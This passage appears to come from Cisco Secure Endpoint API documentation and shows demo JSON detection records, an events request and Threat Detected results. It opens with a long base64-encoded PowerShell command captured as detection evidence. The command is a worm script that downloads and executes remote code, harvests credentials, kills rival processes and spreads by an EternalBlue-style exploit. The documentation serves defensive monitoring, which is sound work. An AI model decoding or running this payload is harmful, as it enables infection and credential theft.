JABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==",
"parent_app": "WmiPrvSE.exe",
"parent_app_path": "C:\\Windows\\System32\\wbem",
"parent_pid": 2236,
"parent_puid": 132461352663910600,
"parent_user": "SYSTEM",
"parent_user_sid": "010100000000000512000000",
"pid": 10724,
"puid": 132465072105597400,
"ts": 1602033881727175700,
"user": "SYSTEM",
"user_sid": "010100000000000512000000"
}
}
],
"limited": false,
"matched": 1
},
"schema": "endpoint",
"schema_epoch": 2,
"sig_id": 20190517123456,
"sig_rev": 5
},
"detection": "apde:20190517123456",
"end_ts": 1647533684,
"engine": "apde",
"id": "d2616Ab846",
"name": "WMIPRVSE Launched Encoded Powershell Command",
"observables": {
"file": [
{
"md5": "a575a7610e5f003cc36df39e07c4ba7d",
"name": "powershell.exe",
"path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"properties": {
"copyright": "© Microsoft Corporation. All rights reserved.",
"file_version": "10.0.14409.1005",
"product": "Microsoft® Windows® Operating System",
"product_version": "10.0.14409.1005"
},
"sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e",
"sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218",
"size": 443392,
"type_id": 1
},
{
"md5": "d683c112190f4b4c6d477d693ee88e35",
"name": "WmiPrvSE.exe",
"path": "C:\\Windows\\System32\\wbem",
"properties": {
"copyright": "© Microsoft Corporation. All rights reserved.",
"file_version": "10.0.14409.1005",
"product": "Microsoft® Windows® Operating System",
"product_version": "10.0.14409.1005"
},
"sha1": "67858ead93feed62c0b1865369840e6e8086f53b",
"sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334",
"size": 425984,
"type_id": 1
}
]
},
"remediated": false,
"severity": "medium",
"silent": false,
"start_ts": 1647533684,
"tactics": [
"TA0002",
"TA0005"
],
"type": "activity",
"normalized": {
"observables": {
"file": {
"name": [
"powershell.exe",
"wmiprvse.exe"
],
"path": [
"c:\\windows\\system32\\windowspowershell\\v1.0",
"c:\\windows\\system32\\wbem"
]
}
},
"name": "wmiprvse launched encoded powershell command"
},
"demo": true
}
}
]
}
Fetch events that are newer than a given timestamp
Request
Requires AuthorizationGET /v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL Edit, then copy and paste on your terminal
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10'
Response
cURL Edit, then copy and paste on your terminal
curl -X GET \ -H 'accept: application/json' \ -H 'content-type: application/json' \ -H 'accept-encoding: identity' \ --compressed -H 'Accept-Encoding: gzip, deflate' \ -u YOUR_API_CLIENT_ID \ 'https://api.consumer.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10'
Shortened for readability
content-type: application/json transfer-encoding: chunked status: 200 OK x-ratelimit-limit: 3000 x-ratelimit-reset: 882 strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000 referrer-policy: strict-origin-when-cross-origin x-ratelimit-remaining: 2819 x-permitted-cross-domain-policies: none x-download-options: noopen etag: W/"f38bca3490486478ae1e334d05620dab" x-frame-options: SAMEORIGIN x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10",
"prev": "https://api.consumer.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&limit=10&offset=0",
"next": "https://api.consumer.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&limit=10&offset=20"
},
"results": {
"total": 1165,
"current_item_count": 10,
"index": 10,
"items_per_page": 10
}
},
"data": [
{
"id": 6533671385032557000,
"timestamp": 1647599259,
"timestamp_nanoseconds": 25000000,
"date": "2022-03-18T10:27:39+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.File.MalParent",
"detection_id": "6533671385032556606",
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"group_guids": [
"6a208a97-badf-4296-87c2-40779ffff0af"
],
"severity": "Medium",
"computer": {
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"hostname": "Demo_AMP_Threat_Audit",
"external_ip": "149.20.236.110",
"user": "johndoe",
"active": true,
"network_addresses": [
{
"ip": "237.160.117.93",
"mac": "b9:f4:70:d0:30:68"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
}
},
"file": {
"disposition": "Malicious",
"file_name": "ekjrngjker.exe",
"file_path": "\\\\?\\C:\\ekjrngjker.exe",
"identity": {
"sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
"sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
"md5": "b99e0a8c56f963246b6464b9fffbf7a2"
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
},
{
"id": 6533671385032557000,
"timestamp": 1647599259,
"timestamp_nanoseconds": 14000000,
"date": "2022-03-18T10:27:39+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.File.MalParent",
"detection_id": "6533671380737589309",
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"group_guids": [
"6a208a97-badf-4296-87c2-40779ffff0af"
],
"severity": "Medium",
"computer": {
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"hostname": "Demo_AMP_Threat_Audit",
"external_ip": "149.20.236.110",
"user": "johndoe",
"active": true,
"network_addresses": [
{
